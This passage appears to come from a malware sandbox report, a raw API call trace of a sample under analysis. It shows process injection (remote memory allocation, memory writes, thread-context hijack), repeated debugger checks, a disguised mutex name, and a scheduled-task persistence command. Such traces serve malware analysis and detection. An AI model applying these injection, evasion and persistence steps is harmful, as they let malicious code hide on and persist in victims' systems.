[444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0195.610] ReadProcessMemory (in: hProcess=0x46fc, lpBaseAddress=0x7efde008, lpBuffer=0x52def4, nSize=0x4, lpNumberOfBytesRead=0x52df44 | out: lpBuffer=0x52def4*, lpNumberOfBytesRead=0x52df44*=0x4) returned 1 [0195.610] VirtualAllocEx (hProcess=0x46fc, lpAddress=0x400000, dwSize=0x153000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0195.629] WriteProcessMemory (in: hProcess=0x46fc, lpBaseAddress=0x400000, lpBuffer=0x33376c8*, nSize=0x400, lpNumberOfBytesWritten=0x52df44 | out: lpBuffer=0x33376c8*, lpNumberOfBytesWritten=0x52df44*=0x400) returned 1 [0195.668] WriteProcessMemory (in: hProcess=0x46fc, lpBaseAddress=0x401000, lpBuffer=0x24b5708*, nSize=0x11c00, lpNumberOfBytesWritten=0x52df44 | out: lpBuffer=0x24b5708*, lpNumberOfBytesWritten=0x52df44*=0x11c00) returned 1 [0195.707] WriteProcessMemory (in: hProcess=0x46fc, lpBaseAddress=0x413000, lpBuffer=0x24c7314*, nSize=0x4a00, lpNumberOfBytesWritten=0x52df44 | out: lpBuffer=0x24c7314*, lpNumberOfBytesWritten=0x52df44*=0x4a00) returned 1 [0195.743] WriteProcessMemory (in: hProcess=0x46fc, lpBaseAddress=0x418000, lpBuffer=0x24cbd20*, nSize=0x600, lpNumberOfBytesWritten=0x52df44 | out: lpBuffer=0x24cbd20*, lpNumberOfBytesWritten=0x52df44*=0x600) returned 1 [0195.787] WriteProcessMemory (in: hProcess=0x46fc, lpBaseAddress=0x54e000, lpBuffer=0x24cc32c*, nSize=0x2e00, lpNumberOfBytesWritten=0x52df44 | out: lpBuffer=0x24cc32c*, lpNumberOfBytesWritten=0x52df44*=0x2e00) returned 1 [0195.823] WriteProcessMemory (in: hProcess=0x46fc, lpBaseAddress=0x551000, lpBuffer=0x24cf138*, nSize=0x1000, lpNumberOfBytesWritten=0x52df44 | out: lpBuffer=0x24cf138*, lpNumberOfBytesWritten=0x52df44*=0x1000) returned 1 [0195.857] WriteProcessMemory (in: hProcess=0x46fc, lpBaseAddress=0x552000, lpBuffer=0x24d0144*, nSize=0x200, lpNumberOfBytesWritten=0x52df44 | out: lpBuffer=0x24d0144*, lpNumberOfBytesWritten=0x52df44*=0x200) returned 1 [0195.891] WriteProcessMemory (in: hProcess=0x46fc, lpBaseAddress=0x7efde008, lpBuffer=0x24d0350*, nSize=0x4, lpNumberOfBytesWritten=0x52df44 | out: lpBuffer=0x24d0350*, lpNumberOfBytesWritten=0x52df44*=0x4) returned 1 [0195.893] SetThreadContext (hThread=0x5568, lpContext=0x24b5430*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x405907, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0195.898] ResumeThread (hThread=0x5568) returned 0x1 [0196.056] CoGetContextToken (in: pToken=0x52e358 | out: pToken=0x52e358) returned 0x0 [0196.056] CObjectContext::QueryInterface () returned 0x0 [0196.056] CObjectContext::GetCurrentThreadType () returned 0x0 [0196.056] Release () returned 0x0 [0196.059] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x33e120*=0xa8, lpdwindex=0x52e1fc | out: lpdwindex=0x52e1fc) returned 0x0 Thread: id = 170 os_tid = 0x728 Thread: id = 171 os_tid = 0x734 [0177.241] CoGetContextToken (in: pToken=0x20ff96c | out: pToken=0x20ff96c) returned 0x800401f0 [0177.241] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0192.064] CloseHandle (hObject=0x2a0) returned 1 [0192.064] CloseHandle (hObject=0x29c) returned 1 [0192.065] CloseHandle (hObject=0x298) returned 1 [0192.065] CloseHandle (hObject=0x294) returned 1 [0192.065] CloseHandle (hObject=0x2cc) returned 1 [0192.065] CloseHandle (hObject=0x2c0) returned 1 [0192.065] CloseHandle (hObject=0x290) returned 1 [0192.065] CloseHandle (hObject=0x2bc) returned 1 [0192.065] CloseHandle (hObject=0x28c) returned 1 [0192.066] CloseHandle (hObject=0x288) returned 1 [0192.066] CloseHandle (hObject=0x2b8) returned 1 [0192.066] CloseHandle (hObject=0x2c4) returned 1 [0192.066] CloseHandle (hObject=0x2b4) returned 1 [0192.066] CloseHandle (hObject=0x284) returned 1 [0192.066] CloseHandle (hObject=0x280) returned 1 [0192.066] CloseHandle (hObject=0x2b0) returned 1 [0192.066] CloseHandle (hObject=0x27c) returned 1 [0192.067] CloseHandle (hObject=0x278) returned 1 [0192.067] CloseHandle (hObject=0x2ac) returned 1 [0192.067] CloseHandle (hObject=0x268) returned 1 [0192.067] CloseHandle (hObject=0x274) returned 1 [0192.067] CloseHandle (hObject=0x2a8) returned 1 [0192.068] CloseHandle (hObject=0x270) returned 1 [0192.068] CloseHandle (hObject=0x2a4) returned 1 [0194.455] CloseHandle (hObject=0xfbc4) returned 1 [0196.075] SetWindowLongW (hWnd=0x3014e, nIndex=-4, dwNewLong=1996301789) returned 7145662 [0196.076] SetClassLongW (hWnd=0x3014e, nIndex=-24, dwNewLong=1996301789) returned 0x6d0896 [0196.077] PostMessageW (hWnd=0x3014e, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0196.078] GetModuleHandleW (lpModuleName=0x0) returned 0xe0000 [0196.078] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.3917f2_r14_ad1", hInstance=0xe0000) returned 0 [0196.080] LocalFree (hMem=0x390bd8) returned 0x0 [0196.080] LocalFree (hMem=0x390b50) returned 0x0 [0196.081] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24e1060, cbSid=0x20ff73c | out: pSid=0x24e1060*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x20ff73c) returned 1 [0196.082] CreateMutexW (lpMutexAttributes=0x24e113c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1044 [0196.082] WaitForSingleObject (hHandle=0x1044, dwMilliseconds=0x1f4) returned 0x0 [0196.082] ReleaseMutex (hMutex=0x1044) returned 1 [0196.082] CloseHandle (hObject=0x1044) returned 1 [0196.082] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24e1358, cbSid=0x20ff73c | out: pSid=0x24e1358*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x20ff73c) returned 1 [0196.082] CreateMutexW (lpMutexAttributes=0x24e1434, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1044 [0196.083] WaitForSingleObject (hHandle=0x1044, dwMilliseconds=0x1f4) returned 0x0 [0196.083] ReleaseMutex (hMutex=0x1044) returned 1 [0196.083] CloseHandle (hObject=0x1044) returned 1 [0196.083] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24e1650, cbSid=0x20ff73c | out: pSid=0x24e1650*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x20ff73c) returned 1 [0196.083] CreateMutexW (lpMutexAttributes=0x24e172c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1044 [0196.083] WaitForSingleObject (hHandle=0x1044, dwMilliseconds=0x1f4) returned 0x0 [0196.083] ReleaseMutex (hMutex=0x1044) returned 1 [0196.083] CloseHandle (hObject=0x1044) returned 1 [0196.083] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24e1948, cbSid=0x20ff73c | out: pSid=0x24e1948*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x20ff73c) returned 1 [0196.084] CreateMutexW (lpMutexAttributes=0x24e1a24, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1044 [0196.084] WaitForSingleObject (hHandle=0x1044, dwMilliseconds=0x1f4) returned 0x0 [0196.084] ReleaseMutex (hMutex=0x1044) returned 1 [0196.084] CloseHandle (hObject=0x1044) returned 1 [0196.084] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24e1c40, cbSid=0x20ff73c | out: pSid=0x24e1c40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x20ff73c) returned 1 [0196.084] CreateMutexW (lpMutexAttributes=0x24e1d1c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1044 [0196.084] WaitForSingleObject (hHandle=0x1044, dwMilliseconds=0x1f4) returned 0x0 [0196.084] ReleaseMutex (hMutex=0x1044) returned 1 [0196.084] CloseHandle (hObject=0x1044) returned 1 [0196.084] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24e1f38, cbSid=0x20ff73c | out: pSid=0x24e1f38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x20ff73c) returned 1 [0196.085] CreateMutexW (lpMutexAttributes=0x24e2014, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1044 [0196.085] WaitForSingleObject (hHandle=0x1044, dwMilliseconds=0x1f4) returned 0x0 [0196.085] ReleaseMutex (hMutex=0x1044) returned 1 [0196.085] CloseHandle (hObject=0x1044) returned 1 [0196.085] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24e2230, cbSid=0x20ff73c | out: pSid=0x24e2230*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x20ff73c) returned 1 [0196.085] CreateMutexW (lpMutexAttributes=0x24e230c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1044 [0196.085] WaitForSingleObject (hHandle=0x1044, dwMilliseconds=0x1f4) returned 0x0 [0196.085] ReleaseMutex (hMutex=0x1044) returned 1 [0196.085] CloseHandle (hObject=0x1044) returned 1 [0196.085] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24e2528, cbSid=0x20ff73c | out: pSid=0x24e2528*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x20ff73c) returned 1 [0196.086] CreateMutexW (lpMutexAttributes=0x24e2604, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1044 [0196.086] WaitForSingleObject (hHandle=0x1044, dwMilliseconds=0x1f4) returned 0x0 [0196.086] ReleaseMutex (hMutex=0x1044) returned 1 [0196.086] CloseHandle (hObject=0x1044) returned 1 [0196.086] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24e2820, cbSid=0x20ff73c | out: pSid=0x24e2820*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x20ff73c) returned 1 [0196.086] CreateMutexW (lpMutexAttributes=0x24e28fc, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1044 [0196.086] WaitForSingleObject (hHandle=0x1044, dwMilliseconds=0x1f4) returned 0x0 [0196.086] ReleaseMutex (hMutex=0x1044) returned 1 [0196.086] CloseHandle (hObject=0x1044) returned 1 [0196.087] EtwEventUnregister () returned 0x0 [0196.097] GdipDeleteFont (font=0x5462940) returned 0x0 [0196.100] CloseHandle (hObject=0x328) returned 1 [0196.103] GdipDisposeImage (image=0x540fcf0) returned 0x0 [0196.114] CloseHandle (hObject=0xfbc4) returned 1 [0196.116] UnmapViewOfFile (lpBaseAddress=0x1e50000) returned 1 [0196.117] CloseHandle (hObject=0x2c8) returned 1 [0196.117] CloseHandle (hObject=0x3c7c) returned 1 [0196.118] RegCloseKey (hKey=0x80000004) returned 0x0 [0196.118] CloseHandle (hObject=0x34d8) returned 1 [0196.119] CloseHandle (hObject=0x52c4) returned 1 [0196.121] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 172 os_tid = 0x73c Thread: id = 173 os_tid = 0x59c Thread: id = 174 os_tid = 0x610 Thread: id = 175 os_tid = 0x568 Thread: id = 176 os_tid = 0x588 [0178.589] CoGetContextToken (in: pToken=0x1fffce4 | out: pToken=0x1fffce4) returned 0x0 [0178.589] CObjectContext::QueryInterface () returned 0x0 [0178.590] CObjectContext::GetCurrentThreadType () returned 0x0 [0178.590] Release () returned 0x0 [0178.590] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0178.590] SleepEx (dwMilliseconds=0xffffffff, bAlertable=1) returned 0xc0 [0178.590] SleepEx (dwMilliseconds=0x3a980, bAlertable=1) returned 0x0 [0190.508] SleepEx (dwMilliseconds=0x38261, bAlertable=1) Thread: id = 177 os_tid = 0x598 Thread: id = 194 os_tid = 0x504 Thread: id = 195 os_tid = 0x4dc [0194.136] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0194.271] SleepEx (dwMilliseconds=0x1f4, bAlertable=1) returned 0x0 [0194.813] IsDebuggerPresent () returned 0 [0194.813] GetCurrentProcessId () returned 0x718 [0194.813] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x52c4 [0194.813] GetExitCodeProcess (in: hProcess=0x52c4, lpExitCode=0x24a9924 | out: lpExitCode=0x24a9924*=0x103) returned 1 [0194.813] CloseHandle (hObject=0x52c4) returned 1 [0194.814] OutputDebugStringW (lpOutputString="") [0194.814] CloseHandle (hObject=0x0) returned 0 [0194.814] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0195.977] IsDebuggerPresent () returned 0 [0195.977] GetCurrentProcessId () returned 0x718 [0195.977] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0xa74c [0195.977] GetExitCodeProcess (in: hProcess=0xa74c, lpExitCode=0x24d0484 | out: lpExitCode=0x24d0484*=0x103) returned 1 [0196.070] CloseHandle (hObject=0xa74c) returned 1 [0196.071] OutputDebugStringW (lpOutputString="") [0196.071] CloseHandle (hObject=0x0) returned 0 [0196.071] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) Thread: id = 196 os_tid = 0x4e4 [0194.253] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0194.259] IsDebuggerPresent () returned 0 [0194.259] GetCurrentProcessId () returned 0x718 [0194.259] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0x12204 [0194.259] GetExitCodeProcess (in: hProcess=0x12204, lpExitCode=0x2527950 | out: lpExitCode=0x2527950*=0x103) returned 1 [0194.259] CloseHandle (hObject=0x12204) returned 1 [0194.265] OutputDebugStringW (lpOutputString="") [0194.270] CloseHandle (hObject=0x0) returned 0 [0194.271] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0195.287] IsDebuggerPresent () returned 0 [0195.287] GetCurrentProcessId () returned 0x718 [0195.287] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0xad8c [0195.287] GetExitCodeProcess (in: hProcess=0xad8c, lpExitCode=0x24b29a8 | out: lpExitCode=0x24b29a8*=0x103) returned 1 [0195.287] CloseHandle (hObject=0xad8c) returned 1 [0195.287] OutputDebugStringW (lpOutputString="") [0195.288] CloseHandle (hObject=0x0) returned 0 [0195.288] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) Thread: id = 197 os_tid = 0x7ac Thread: id = 205 os_tid = 0x46c [0196.026] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0196.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x33526e8, Length=0x20000, ResultLength=0xbc3f3d4 | out: SystemInformation=0x33526e8, ResultLength=0xbc3f3d4*=0x7e18) returned 0x0 [0196.055] SleepEx (dwMilliseconds=0x7d0, bAlertable=1) Thread: id = 206 os_tid = 0x134 [0196.125] SleepEx (dwMilliseconds=0x14, bAlertable=0) Process: id = "17" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x62737000" os_pid = "0x74c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x678" cmd_line = "\"C:\\Windows\\System32\\schtasks.exe\" /Create /TN \"Updates\\ChFIQxtpqP\" /XML \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 182 os_tid = 0x768 [0183.307] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f95c | out: lpSystemTimeAsFileTime=0x12f95c*(dwLowDateTime=0xba48aa10, dwHighDateTime=0x1d6a092)) [0183.307] GetCurrentProcessId () returned 0x74c [0183.307] GetCurrentThreadId () returned 0x768 [0183.307] GetTickCount () returned 0x113c5a0 [0183.307] RtlQueryPerformanceCounter () returned 0x1 [0183.309] GetModuleHandleA (lpModuleName=0x0) returned 0x600000 [0183.309] __set_app_type (_Type=0x1) [0183.309] __p__fmode () returned 0x768131f4 [0183.309] __p__commode () returned 0x768131fc [0183.309] SetUnhandledExceptionFilter 